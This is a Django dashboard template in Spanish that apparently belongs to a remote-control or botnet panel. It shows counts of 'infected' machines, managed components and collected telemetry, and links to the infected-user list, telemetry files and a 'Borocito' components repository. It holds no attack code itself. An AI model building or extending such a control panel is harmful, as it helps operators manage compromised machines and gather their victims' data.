{% extends 'base.html' %}


{% block page_title%}Dashboard{% endblock %}
{% block content %}
<div class="container mt-4">
    <h1>Server running on {{ request.get_host }}</h1>
    <hr>
    <div class="row">
        <div class="col">
            <div class="card text-center">
                <div class="card-header">
                    Infectados
                </div>
                <div class="card-body">
                    <h1 class="display-3 card-title">{{ infectados }}</h1>
                </div>
                <div class="card-footer text-body-secondary">
                    <a href="{% url 'web:user-list' %}" class="btn btn-primary w-100">Ver lista</a>
                </div>
            </div>
        </div>
        <div class="col">
            <div class="card text-center">
                <div class="card-header">
                    Componentes
                </div>
                <div class="card-body">
                    <h1 class="display-3 card-title">{{ componentes }}</h1>
                </div>
                <div class="card-footer text-body-secondary">
                    <div class="row">
                        <div class="col">
                            <a href="{% url 'configs:components' %}" class="btn btn-primary w-100">Administrar</a>
                        </div>
                        <div class="col">
                            <a target="_blank" href="https://github.com/Borocito/Components-for-Borocito/blob/main/README.md" class="btn btn-primary w-100">Ver docs</a>
                        </div>
                    </div>
                </div>
            </div>
        </div>
        <div class="col">
            <div class="card text-center">
                <div class="card-header">
                    Telemetria
                </div>
                <div class="card-body">
                    <h1 class="display-3 card-title">{{ telemetria }}</h1>
                </div>
                <div class="card-footer text-body-secondary">
                    <a href="{% url 'web:telemetry' %}" class="btn btn-primary w-100">Ver archivos</a>
                </div>
            </div>
        </div>
    </div>
</div>
{% endblock %}